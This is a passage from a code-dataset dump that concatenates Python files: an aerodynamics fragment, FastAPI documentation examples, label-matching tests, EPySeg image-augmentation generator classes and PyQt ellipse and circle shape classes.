else:
faero_st=data.aero.timestep_info[tt].body_steady_forces
faero_un=data.aero.timestep_info[tt].body_unsteady_forces
# sum over surfaces
Fst[tt,:]=np.sum(faero_st,axis=0)
Fun[tt,:]=np.sum(faero_un,axis=0)
return Fst,Fun
def saveh5(savedir,h5filename,data):
'''
Saves state of UVLM steady solution to h5 file.
'''
raise NameError('Function moved to save.save_aero!')
``` |
{
"source": "jomsdev/randomizedNLA",
"score": 3
} |
#### File: randomizedNLA/tests/utils.py
```python
from __future__ import division, print_function, absolute_import
import numpy as np
#
def make_random_dense_gaussian_matrix(n_rows, n_columns, mu=0, sigma=0.01):
"""
    Return an (n_rows, n_columns) matrix whose entries are i.i.d. Gaussian
    samples drawn from N(mu, sigma**2).
"""
res = np.random.normal(mu, sigma, n_rows*n_columns)
return np.reshape(res, (n_rows, n_columns))
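# Illustrative usage (an addition for this edit, not part of the original
# module): draw a Gaussian sketching matrix and check its sample statistics.
if __name__ == '__main__':
    S = make_random_dense_gaussian_matrix(1000, 50, mu=0, sigma=0.01)
    print(S.shape)            # (1000, 50)
    print(S.mean(), S.std())  # approximately mu and sigma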
``` |
{
"source": "jomue/fastapi",
"score": 3
} |
#### File: docs_src/custom_response/tutorial008.py
```python
from fastapi import FastAPI
from fastapi.responses import StreamingResponse
some_file_path = "large-video-file.mp4"
app = FastAPI()
@app.get("/")
def main():
def iterfile(): # (1)
with open(some_file_path, mode="rb") as file_like: # (2)
yield from file_like # (3)
return StreamingResponse(iterfile(), media_type="video/mp4")
```
#### File: docs_src/path_operation_advanced_configuration/tutorial007.py
```python
from typing import List
import yaml
from fastapi import FastAPI, HTTPException, Request
from pydantic import BaseModel, ValidationError
app = FastAPI()
class Item(BaseModel):
name: str
tags: List[str]
@app.post(
"/items/",
openapi_extra={
"requestBody": {
"content": {"application/x-yaml": {"schema": Item.schema()}},
"required": True,
},
},
)
async def create_item(request: Request):
raw_body = await request.body()
try:
data = yaml.safe_load(raw_body)
except yaml.YAMLError:
raise HTTPException(status_code=422, detail="Invalid YAML")
try:
item = Item.parse_obj(data)
except ValidationError as e:
raise HTTPException(status_code=422, detail=e.errors())
return item
``` |
{
"source": "jo-mueller/biapol-utilities",
"score": 3
} |
#### File: biapol_utilities/data/_data.py
```python
from skimage import io
import numpy as np
import matplotlib
import os
data_dir = os.path.abspath(os.path.dirname(__file__))
def blobs():
"""Gray-level "blobs" image [1].
Can be used for segmentation and denoising examples.
Returns
-------
blobs : (256, 254) uint8 ndarray
Blobs image.
References
----------
.. [1] https://imagej.nih.gov/ij/images/
"""
return io.imread(os.path.join(data_dir, "blobs.png"))
def labels_colormap():
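    # Build (once) a random RGB lookup table for up to 65536 labels, with
    # label 0 mapped to black; the colormap is cached on the function object
    # and reproducible thanks to the fixed RandomState seed.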
if not hasattr(labels_colormap, "labels_cmap"):
state = np.random.RandomState(1234567890)
lut = state.rand(65537, 3)
lut[0, :] = 0
labels_colormap.labels_cmap = matplotlib.colors.ListedColormap(lut)
return labels_colormap.labels_cmap
```
#### File: biapol-utilities/tests/test_jaccard_score.py
```python
from biapol_utilities import label
import numpy as np
def test_compare_labels():
a = np.asarray([5, 0, 0, 1, 1, 1, 2, 2])
b = np.asarray([5, 0, 0, 1, 1, 1, 2, 3])
result = label.compare_labels(a, b)
assert('jaccard_score' in result.columns)
assert('dice_score' in result.columns)
def test_compare_labels2():
a = np.asarray([5, 0, 0, 1, 1, 1, 2, 2])
b = np.asarray([6, 0, 0, 1, 1, 1, 2, 3])
result = label.compare_labels(a, b)
assert(np.max(result.label) == np.max([a, b]))
def test_compare_labels3():
a = np.asarray([5, 0, 0, 1, 1, 1, 2, 2])
b = np.asarray([6, 0, 0, 1, 1, 1, 2, 3])
result = label.compare_labels(a, b)
assert(result[result.label == 0].jaccard_score.to_numpy()[0] == 1.0)
if __name__ == "__main__":
test_compare_labels()
test_compare_labels2()
test_compare_labels3()
```
#### File: biapol-utilities/tests/test_match_labels.py
```python
import numpy as np
from biapol_utilities import label
def test_match_labels():
labels_x = np.asarray([1, 1, 1, 0, 0, 2, 2, 4, 4, 4, 0], dtype=np.uint8)
labels_y = labels_x * 2
matching_method1 = label.match_max_similarity
matching_method2 = label.match_gale_shapley
labels_y_matched1 = label.match_labels(labels_x, labels_y,
matching_method=matching_method1)
labels_y_matched2 = label.match_labels(labels_x, labels_y,
matching_method=matching_method2)
assert np.array_equal(labels_y_matched1, labels_x)
assert np.array_equal(labels_y_matched2, labels_x)
def test_match_labels_2():
labels_x = np.asarray([1, 1, 6, 0, 0, 3, 3, 4, 4, 4, 0], dtype=np.uint8)
labels_y = np.asarray([1, 1, 3, 0, 0, 2, 2, 5, 5, 5, 4], dtype=np.uint8)
reference_y_matched = np.asarray([1, 1, 6, 0, 0, 3, 3, 4, 4, 4, 7],
dtype=np.uint8)
matching_method = label.match_max_similarity
labels_y_matched = label.match_labels(labels_x, labels_y,
matching_method=matching_method)
assert np.array_equal(labels_y_matched, reference_y_matched)
def test_match_labels_3():
labels_x = np.asarray([1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 0], dtype=np.uint8)
labels_y = np.asarray([1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=np.uint8)
reference_y_matched = np.asarray([1, 1, 4, 4, 4, 2, 2, 2, 3, 3, 3],
dtype=np.uint8)
matching_method = label.match_gale_shapley
labels_y_matched = label.match_labels(labels_x, labels_y,
matching_method=matching_method,
filter_method=None)
assert np.array_equal(labels_y_matched, reference_y_matched)
def test_gale_shapley():
labels_x = np.asarray([0, 1, 2, 3])
labels_ref = np.asarray([0, 2, 1, 3])
similarity_matrix = [[0.1, 0.0, 0.0, 0.0],
[0.0, 0.2, 0.5, 0.8],
[0.0, 0.9, 0.2, 0.5],
[0.0, 0.8, 0.7, 0.81]]
similarity_matrix = np.asarray(similarity_matrix)
output = label.match_gale_shapley(labels_x, labels_x, similarity_matrix)
assert np.array_equal(output, labels_ref)
def test_gale_shapley2():
labels_x = np.asarray([0, 1, 2, 3])
labels_ref = np.asarray([0, 2, 3, 1])
similarity_matrix = [[0.1, 0.0, 0.0, 0.0],
[0.0, 0.5, 0.51, 0.4],
[0.0, 0.55, 0.4, 0.3],
[0.0, 0.6, 0.45, 0.5]]
similarity_matrix = np.asarray(similarity_matrix)
output = label.match_gale_shapley(labels_x, labels_x, similarity_matrix)
assert np.array_equal(output, labels_ref)
if __name__ == "__main__":
test_gale_shapley2()
test_gale_shapley()
test_match_labels_3()
test_match_labels_2()
test_match_labels()
``` |
{
"source": "jo-mueller/EPySeg",
"score": 2
} |
#### File: deeplearning/augmentation/meta.py
```python
from matplotlib import pyplot as plt
from epyseg.deeplearning.augmentation.generators.data import DataGenerator
from epyseg.deeplearning.augmentation.generators.meta import MetaGenerator
import numpy as np
# logging
from epyseg.tools.logger import TA_logger
logger = TA_logger()
# MINIMAL_AUGMENTATIONS = [{'type': None}, {'type': None},{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'}, {'type': 'translate'}, {'type': 'rotate'}]
# added intensity shifts to the minimal augmentation --> should make it more robust for masking
MINIMAL_AUGMENTATIONS = [{'type': None}, {'type': None},{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'}, {'type': 'translate'}, {'type': 'rotate'},{'type': 'random_intensity_gamma_contrast'}, {'type': 'intensity'}, {'type': 'random_intensity_gamma_contrast'}, {'type': 'intensity'}]
ALL_AUGMENTATIONS_BUT_INVERT_AND_HIGH_NOISE = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'},
{'type': 'low noise'}, {'type': 'high noise'}, {'type': 'stretch'}]
ALL_AUGMENTATIONS_BUT_INVERT = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'}, {'type': 'low noise'},
{'type': 'high noise'}, {'type': 'stretch'}]
ALL_AUGMENTATIONS_BUT_INVERT_AND_NOISE = [{'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'}, {'type': 'shear'},
{'type': 'flip'}, {'type': 'rotate'}, {'type': 'stretch'},
{'type': 'rotate (interpolation free)'},
{'type': 'rotate (interpolation free)'},
{'type': 'rotate (interpolation free)'}]
ALL_AUGMENTATIONS = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'}, {'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'}, {'type': 'invert'}, {'type': 'low noise'},
{'type': 'high noise'}, {'type': 'stretch'}]
ALL_AUGMENTATIONS_BUT_HIGH_NOISE = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'}, {'type': 'invert'},
{'type': 'low noise'}, {'type': 'stretch'}]
STRETCHED_AUG_EPITHELIA = [{'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'invert'}, {'type': 'flip'}, {'type': 'translate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'}]
STRETCHED_AUG_EPITHELIA_2 = [{'type': None}, {'type': None}, {'type': None}, {'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'invert'},{'type': 'invert'},{'type': 'invert'},{'type': 'invert'}, {'type': 'flip'}, {'type': 'translate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'}]
STRETCHED_AUG_EPITHELIA_3 = [{'type': None}, {'type': None}, {'type': None}, {'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'flip'}, {'type': 'translate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'},{'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}]
STRETCHED_AUG_EPITHELIA_4 = [{'type': None}, {'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'flip'}, {'type': 'translate'},{'type': 'flip'}, {'type': 'zoom'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'rotate'}, {'type': 'rotate'}, {'type': 'rotate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'},{'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}]
TRAINING_FOR_BEGINNING_LITTLE_INTERPOLATION = [{'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': None}, {'type': 'flip'}, {'type': 'translate'}, {'type': 'blur'}]
NO_AUGMENTATION = [{'type': None}]
TEST_AUGMENTATION = [{'type': 'invert'}]
SAFE_AUGMENTATIONS_FOR_SINGLE_PIXEL_WIDE = [{'type': None}, {'type': 'blur'}, {'type': 'translate'}, {'type': 'flip'}]
SAFE_AUGMENTATIONS_FOR_SINGLE_PIXEL_WIDE_PLUS_INVERT_AND_NOISE = [{'type': None}, {'type': 'blur'},
{'type': 'translate'}, {'type': 'flip'},
{'type': 'invert'}, {'type': 'low noise'}]
class MetaAugmenter:
def __init__(self, inputs=None, outputs=None, output_folder=None, input_shape=(None, None, None, 1),
output_shape=(None, None, None, 1), input_channel_of_interest=None, output_channel_of_interest=None,
input_channel_reduction_rule='copy channel of interest to all channels',
input_channel_augmentation_rule='copy channel of interest to all channels',
output_channel_reduction_rule='copy channel of interest to all channels',
output_channel_augmentation_rule='copy channel of interest to all channels',
augmentations=None, crop_parameters=None, mask_dilations=None, infinite=False,
default_input_tile_width=128, default_input_tile_height=128,
default_output_tile_width=128, default_output_tile_height=128,
keep_original_sizes=False,
input_normalization={'method': 'Rescaling (min-max normalization)', 'range': [0, 1],
'individual_channels': True},
output_normalization={'method': 'Rescaling (min-max normalization)', 'range': [0, 1],
'individual_channels': True},
validation_split=0, test_split=0,
shuffle=True, clip_by_frequency=None, is_predict_generator=False, overlap_x=0, overlap_y=0,
batch_size=None, batch_size_auto_adjust=False, invert_image=False, input_bg_subtraction=None, create_epyseg_style_output=None, remove_n_border_mask_pixels=None,
is_output_1px_wide=False, rebinarize_augmented_output=False,
rotate_n_flip_independently_of_augmentation=False,
mask_lines_and_cols_in_input_and_mask_GT_with_nans=None, # should be 'id' or 'noid' and requires a custom loss and metrics --> can only be applied with some losses
z_frames_to_add=None,
**kwargs):
self.augmenters = []
self.inputs = inputs
self.outputs = outputs
self.output_folder = output_folder
self.input_shape = input_shape
self.output_shape = output_shape
self.input_channel_of_interest = input_channel_of_interest
self.output_channel_of_interest = output_channel_of_interest
self.input_channel_reduction_rule = input_channel_reduction_rule
self.input_channel_augmentation_rule = input_channel_augmentation_rule
self.output_channel_reduction_rule = output_channel_reduction_rule
self.output_channel_augmentation_rule = output_channel_augmentation_rule
self.augmentations = augmentations
self.crop_parameters = crop_parameters
self.batch_size = batch_size
self.batch_size_auto_adjust = batch_size_auto_adjust
self.invert_image = invert_image
self.input_bg_subtraction = input_bg_subtraction
self.create_epyseg_style_output=create_epyseg_style_output
self.remove_n_border_mask_pixels = remove_n_border_mask_pixels
self.is_output_1px_wide = is_output_1px_wide
self.rebinarize_augmented_output = rebinarize_augmented_output
self.rotate_n_flip_independently_of_augmentation = rotate_n_flip_independently_of_augmentation
self.mask_lines_and_cols_in_input_and_mask_GT_with_nans = mask_lines_and_cols_in_input_and_mask_GT_with_nans
self.z_frames_to_add = z_frames_to_add
self.mask_dilations = mask_dilations
self.infinite = infinite
self.default_input_tile_width = default_input_tile_width
self.default_input_tile_height = default_input_tile_height
self.default_output_tile_width = default_output_tile_width
self.default_output_tile_height = default_output_tile_height
self.keep_original_sizes = keep_original_sizes
self.input_normalization = input_normalization
self.output_normalization = output_normalization
self.validation_split = validation_split
self.test_split = test_split
self.shuffle = shuffle
self.clip_by_frequency = clip_by_frequency
self.is_predict_generator = is_predict_generator
self.overlap_x = overlap_x
self.overlap_y = overlap_y
if inputs is not None:
for i, inp in enumerate(inputs):
if outputs is not None:
cur_output = outputs[i]
else:
cur_output = None
self.augmenters.append(
DataGenerator(inputs=inp, outputs=cur_output, output_folder=output_folder, input_shape=input_shape,
output_shape=output_shape, input_channel_of_interest=input_channel_of_interest,
output_channel_of_interest=output_channel_of_interest,
input_channel_reduction_rule=input_channel_reduction_rule,
input_channel_augmentation_rule=input_channel_augmentation_rule,
output_channel_reduction_rule=output_channel_reduction_rule,
output_channel_augmentation_rule=output_channel_augmentation_rule,
augmentations=augmentations, crop_parameters=crop_parameters,
mask_dilations=mask_dilations,
infinite=infinite, default_input_tile_width=default_input_tile_width,
default_input_tile_height=default_input_tile_height,
default_output_tile_width=default_output_tile_width,
default_output_tile_height=default_output_tile_height,
keep_original_sizes=keep_original_sizes,
input_normalization=input_normalization,
output_normalization=output_normalization,
validation_split=validation_split, test_split=test_split,
shuffle=shuffle,
clip_by_frequency=clip_by_frequency,
is_predict_generator=is_predict_generator, overlap_x=overlap_x, overlap_y=overlap_y,
invert_image=invert_image, input_bg_subtraction=input_bg_subtraction, create_epyseg_style_output=create_epyseg_style_output, remove_n_border_mask_pixels=remove_n_border_mask_pixels,
is_output_1px_wide=is_output_1px_wide,
rebinarize_augmented_output=rebinarize_augmented_output,
rotate_n_flip_independently_of_augmentation=rotate_n_flip_independently_of_augmentation,
mask_lines_and_cols_in_input_and_mask_GT_with_nans=mask_lines_and_cols_in_input_and_mask_GT_with_nans,
z_frames_to_add = z_frames_to_add
))
def _get_significant_parameter(self, local_param, global_param):
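        # A per-dataset (local) parameter takes precedence over the global
        # default stored on this MetaAugmenter instance.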
if local_param is not None:
return local_param
else:
return global_param
def appendDatasets(self, datasets=None, augmentations=None, **kwargs):
logger.debug('datasets ' + str(datasets))
logger.debug('augs ' + str(augmentations))
if datasets is None:
return
# parse and handle inputs
for dataset in datasets:
fused = {**dataset, 'augmentations': augmentations}
# print('fused', fused)
self.append(**fused)
def append(self, inputs=None, outputs=None, output_folder=None, input_shape=None, output_shape=None,
input_channel_of_interest=None, output_channel_of_interest=None,
input_channel_reduction_rule=None, input_channel_augmentation_rule=None,
output_channel_reduction_rule=None, output_channel_augmentation_rule=None,
augmentations=None, crop_parameters=None, mask_dilations=None, infinite=None,
default_input_tile_width=None, default_input_tile_height=None, default_output_tile_width=None,
default_output_tile_height=None, keep_original_sizes=None, input_normalization=None,
output_normalization=None, validation_split=None, test_split=None,
shuffle=None, clip_by_frequency=None,
is_predict_generator=None, overlap_x=None, overlap_y=None, invert_image=None, input_bg_subtraction=None,create_epyseg_style_output=None,
remove_n_border_mask_pixels=None, is_output_1px_wide=None, rebinarize_augmented_output=None,
rotate_n_flip_independently_of_augmentation=None,mask_lines_and_cols_in_input_and_mask_GT_with_nans=None,
z_frames_to_add = None,
**kwargs):
# print('debug 123', inputs, outputs, self.inputs, self.outputs)
# inputs and outputs are ok --> why is there a bug then????
self.augmenters.append(
DataGenerator(inputs=self._get_significant_parameter(inputs, self.inputs),
outputs=self._get_significant_parameter(outputs, self.outputs),
output_folder =self._get_significant_parameter(output_folder, self.output_folder),
input_shape=self._get_significant_parameter(input_shape, self.input_shape),
output_shape=self._get_significant_parameter(output_shape, self.output_shape),
input_channel_of_interest=self._get_significant_parameter(input_channel_of_interest,
self.input_channel_of_interest),
output_channel_of_interest=self._get_significant_parameter(output_channel_of_interest,
self.output_channel_of_interest),
input_channel_reduction_rule=self._get_significant_parameter(input_channel_reduction_rule,
self.input_channel_reduction_rule),
input_channel_augmentation_rule=self._get_significant_parameter(
input_channel_augmentation_rule, self.input_channel_augmentation_rule),
output_channel_reduction_rule=self._get_significant_parameter(output_channel_reduction_rule,
self.output_channel_reduction_rule),
output_channel_augmentation_rule=self._get_significant_parameter(
output_channel_augmentation_rule, self.output_channel_augmentation_rule),
augmentations=self._get_significant_parameter(augmentations, self.augmentations),
crop_parameters=self._get_significant_parameter(crop_parameters, self.crop_parameters),
mask_dilations=self._get_significant_parameter(mask_dilations, self.mask_dilations),
infinite=self._get_significant_parameter(infinite, self.infinite),
default_input_tile_width=self._get_significant_parameter(default_input_tile_width,
self.default_input_tile_width),
default_input_tile_height=self._get_significant_parameter(default_input_tile_height,
self.default_input_tile_height),
default_output_tile_width=self._get_significant_parameter(default_output_tile_width,
self.default_output_tile_width),
default_output_tile_height=self._get_significant_parameter(default_output_tile_height,
self.default_output_tile_height),
keep_original_sizes=self._get_significant_parameter(keep_original_sizes,
self.keep_original_sizes),
validation_split=self._get_significant_parameter(validation_split, self.validation_split),
test_split=self._get_significant_parameter(test_split, self.test_split),
shuffle=self._get_significant_parameter(shuffle, self.shuffle),
clip_by_frequency=self._get_significant_parameter(clip_by_frequency, self.clip_by_frequency),
is_predict_generator=self._get_significant_parameter(is_predict_generator,
self.is_predict_generator),
overlap_x=self._get_significant_parameter(overlap_x, self.overlap_x),
overlap_y=self._get_significant_parameter(overlap_y, self.overlap_y),
invert_image=self._get_significant_parameter(invert_image, self.invert_image),
input_bg_subtraction=self._get_significant_parameter(input_bg_subtraction, self.input_bg_subtraction),
create_epyseg_style_output=self._get_significant_parameter(create_epyseg_style_output, self.create_epyseg_style_output),
remove_n_border_mask_pixels=self._get_significant_parameter(remove_n_border_mask_pixels,
self.remove_n_border_mask_pixels),
input_normalization=self._get_significant_parameter(input_normalization,
self.input_normalization),
output_normalization=self._get_significant_parameter(output_normalization,
self.output_normalization),
is_output_1px_wide=self._get_significant_parameter(is_output_1px_wide,
self.is_output_1px_wide),
rebinarize_augmented_output=self._get_significant_parameter(rebinarize_augmented_output,
self.rebinarize_augmented_output),
rotate_n_flip_independently_of_augmentation=self._get_significant_parameter(rotate_n_flip_independently_of_augmentation,
self.rotate_n_flip_independently_of_augmentation),
mask_lines_and_cols_in_input_and_mask_GT_with_nans=self._get_significant_parameter(mask_lines_and_cols_in_input_and_mask_GT_with_nans,
self.mask_lines_and_cols_in_input_and_mask_GT_with_nans),
z_frames_to_add=self._get_significant_parameter(z_frames_to_add, self.z_frames_to_add),
))
def validation_generator(self, infinite=False):
if infinite:
while True:
for orig, label in self._validation_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
else:
for orig, label in self._validation_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
def train_generator(self, infinite=False):
if infinite:
while True:
for orig, label in self._train_generator(skip_augment=False):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
else:
for orig, label in self._train_generator(skip_augment=False):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
def test_generator(self, infinite=False):
if infinite:
while True:
for orig, label in self._test_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
else:
for orig, label in self._test_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
def angular_yielder(self, orig, mask, count):
# mask = self.extra_watershed_mask(mask) # shrink mask to 1 px wide irrespective of transfo
        # NB: could generate the nine stacks here --> TODO --> would increase the dataset size 9x, but it seems a good idea
# can also copy the code of the other stuff
if count == 0:
# rot 180
return np.rot90(orig, 2, axes=(-3, -2)), np.rot90(mask, 2, axes=(-3, -2))
if count == 1:
# flip hor
return np.flip(orig, -2), np.flip(mask, -2)
if count == 2:
# flip ver
return np.flip(orig, -3), np.flip(mask, -3)
# make it yield the original and the nine versions of it
# --> TODO
        # this works: it generates the 9 orientations of the stack --> probably what I want --> put everything here
if count == 3:
# yield np.rot90(orig, axes=(-3, -2)), np.rot90(mask, axes=(-3, -2))
# rot 90
return np.rot90(orig, axes=(-3, -2)), np.rot90(mask, axes=(-3, -2))
if count == 4:
# rot 90_flipped_hor or ver
return np.flip(np.rot90(orig, axes=(-3, -2)), -2), np.flip(np.rot90(mask, axes=(-3, -2)), -2)
if count == 5:
# rot 90_flipped_hor or ver
return np.flip(np.rot90(orig, axes=(-3, -2)), -3), np.flip(np.rot90(mask, axes=(-3, -2)), -3)
if count == 6:
# rot 270
return np.rot90(orig, 3, axes=(-3, -2)), np.rot90(mask, 3, axes=(-3, -2))
def _train_generator(self, skip_augment, first_run=False):
train = MetaGenerator(self.augmenters, shuffle=self.shuffle, batch_size=self.batch_size, gen_type='train')
for out in train.generator(skip_augment, first_run):
try:
# # print(len(out))
# # that works check that all are there and all are possible otherwise skip
# # --> need ensure that width = height
# # need set a parameter to be sure to use it or not and need remove rotation and flip from augmentation list (or not in fact)
# orig, mask = out
# augmentations = 7
# if orig[0].shape[-2] != orig[0].shape[-3]:
# augmentations = 3
# for aug in range(augmentations):
# yield self.angular_yielder(orig, mask, aug)
# yield orig, mask
yield out
except:
# failed to generate output --> continue
continue
def _test_generator(self, skip_augment, first_run=False):
test = MetaGenerator(self.augmenters, shuffle=False, batch_size=self.batch_size, gen_type='test')
for out in test.generator(skip_augment, first_run):
# # yield out
# # print(len(out))
# # that works check that all are there and all are possible otherwise skip
# # --> need ensure that width = height
# # need set a parameter to be sure to use it or not and need remove rotation and flip from augmentation list (or not in fact)
# orig, mask = out
# augmentations = 7
# if orig[0].shape[-2] != orig[0].shape[-3]:
# augmentations = 3
# for aug in range(augmentations):
# yield self.angular_yielder(orig, mask, aug)
# yield orig, mask
yield out
def _validation_generator(self, skip_augment, first_run=False):
valid = MetaGenerator(self.augmenters, shuffle=self.shuffle, batch_size=self.batch_size, gen_type='valid')
for out in valid.generator(skip_augment, first_run):
# # yield out
# # print(len(out))
# # that works check that all are there and all are possible otherwise skip
# # --> need ensure that width = height
# # need set a parameter to be sure to use it or not and need remove rotation and flip from augmentation list (or not in fact)
# orig, mask = out
# augmentations = 7
# if orig[0].shape[-2] != orig[0].shape[-3]:
# augmentations = 3
# for aug in range(augmentations):
# yield self.angular_yielder(orig, mask, aug)
# yield orig, mask
yield out
def predict_generator(self): # TODO can use datagen for now
pass
def __len__(self):
# returns the nb of datasets
if not self.augmenters:
return 0
return len(self.augmenters)
# returns the real nb of batches with the current parameters...
def get_train_length(self, first_run=False):
# need run the train algo once with real tiled data to get the counts
train_generator = self._train_generator(skip_augment=True, first_run=first_run)
nb_batches = 0
for _, _ in train_generator:
nb_batches += 1
return nb_batches
def get_test_length(self, first_run=False):
# need run the train algo once with real tiled data to get the counts
test_generator = self._test_generator(skip_augment=True, first_run=first_run)
nb_batches = 0
for _, _ in test_generator:
nb_batches += 1
return nb_batches
def get_validation_length(self, first_run=False):
# need run the train algo once with real tiled data to get the counts
validation_generator = self._validation_generator(skip_augment=True, first_run=first_run)
nb_batches = 0
for _, _ in validation_generator:
nb_batches += 1
return nb_batches
if __name__ == '__main__':
pass
```
#### File: deeplearning/callbacks/stop.py
```python
import tensorflow.keras as keras
# call this to stop training
class myStopCallback(keras.callbacks.Callback):
def __init__(self):
self.stop_me = False
def on_epoch_begin(self, epoch, logs={}):
if self.stop_me:
self.model.stop_training = True
def on_epoch_end(self, epoch, logs={}):
if self.stop_me:
self.model.stop_training = True
def on_batch_begin(self, batch, logs={}):
if self.stop_me:
self.model.stop_training = True
def on_batch_end(self, batch, logs={}):
if self.stop_me:
self.model.stop_training = True
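# Illustrative usage (an addition for this edit, not part of the original
# module): pass the callback to fit() and flip stop_me, e.g. from a GUI thread.
# stop_cb = myStopCallback()
# model.fit(x, y, epochs=100, callbacks=[stop_cb])
# ...later:
# stop_cb.stop_me = True  # training halts at the next batch/epoch boundary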
```
#### File: draw/shapes/circle2d.py
```python
from epyseg.draw.shapes.ellipse2d import *
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class Circle2D(Ellipse2D):
def __init__(self, *args, color=0xFFFF00, fill_color=None, opacity=1., stroke=0.65,line_style=None, **kwargs):
if len(args) == 3:
super(Circle2D, self).__init__(*args, args[-1])
elif len(args) == 4:
logger.error("too many values, square pnly has, x,y and width")
else:
super(Circle2D, self).__init__(*args) # create empty circle
self.setRect(self.rect())
self.color = color
self.fill_color = fill_color
self.stroke = stroke
self.opacity = opacity
self.line_style = line_style
# rotation
# self.theta = theta
def add(self, *args):
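        # Expand the two drag points into a square bounding box (side =
        # max(|dx|, |dy|)) so the underlying ellipse stays a perfect circle.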
p1 = args[0]
p2 = args[1]
rect = self.rect()
x = p2.x()
y = p2.y()
x2 = p1.x()
y2 = p1.y()
if p1.x() < p2.x():
x = p1.x()
x2 = p2.x()
if p1.y() < p2.y():
y = p1.y()
y2 = p2.y()
w = abs(x - x2)
h = abs(y - y2)
if w < h:
rect.setWidth(h)
rect.setHeight(h)
else:
rect.setWidth(w)
rect.setHeight(w)
rect.setX(x)
rect.setY(y)
self.setRect(rect)
self.isSet = True
if __name__ == '__main__':
test = Circle2D(0, 0, 100)
# print(test.x(), test.y(), test.width(), test.height())
print(test.contains(QPointF(50, 50)))
print(test.contains(QPointF(15, 15)))
print(test.contains(QPointF(-1, -1)))
print(test.contains(QPointF(0, 0)))
print(test.contains(QPointF(100, 100)))
print(test.contains(QPointF(100, 100.1)))
print(test.x())
print(test.y())
print(test.translate(QPoint(10, 10)))
print(test.x())
print(test.y())
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# print(test.length()) # sqrt 2 --> 141
# # if it's an arrow I can add easily all the stuff I need
#
# test = Rect2D(0, 0, 1, 1)
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# import math
# print(test.length() == math.sqrt(2)) # sqrt 2
#
# test2 = Rect2D()
# p1 = test2.p1()
# print(p1.x(), p1.y())
# p2 = test2.p2()
# print(p2.x(), p2.y())
# print(test2.arrow)
```
#### File: draw/shapes/ellipse2d.py
```python
from PyQt5 import QtWidgets
from PyQt5.QtCore import QPoint, QPointF, Qt, QRectF
from PyQt5.QtGui import QBrush, QPen, QColor, QTransform
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class Ellipse2D(QtWidgets.QGraphicsEllipseItem):
isSet = False
def __init__(self, *args, color=0xFFFF00, fill_color=None, opacity=1., stroke=0.65, line_style=None,theta=0, **kwargs):
super(Ellipse2D, self).__init__(*args)
if not args:
self.isSet = False
else:
self.isSet = True
self.setRect(self.rect())
self.color = color
self.fill_color = fill_color
self.stroke = stroke
self.opacity = opacity
self.scale = 1
self.translation = QPointF()
self.line_style = line_style
# rotation
self.theta = theta
def set_rotation(self, theta):
self.theta = theta
def set_opacity(self, opacity):
self.opacity = opacity
    def set_line_style(self, style):
        '''allows the outline to be dashed, dotted or follow a custom pattern

        :param style: one of Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine or Qt.DashDotDotLine, or a list of numbers (in which case Qt.CustomDashLine is assumed and the list is used as the dash pattern); None resets the outline to a plain solid line
        :return:
        '''
        self.line_style = style
        # if style is a list, a custom dash pattern is assumed; otherwise the given Qt pen style is applied at draw time
def draw(self, painter, draw=True):
if self.color is None and self.fill_color is None:
return
if draw:
painter.save()
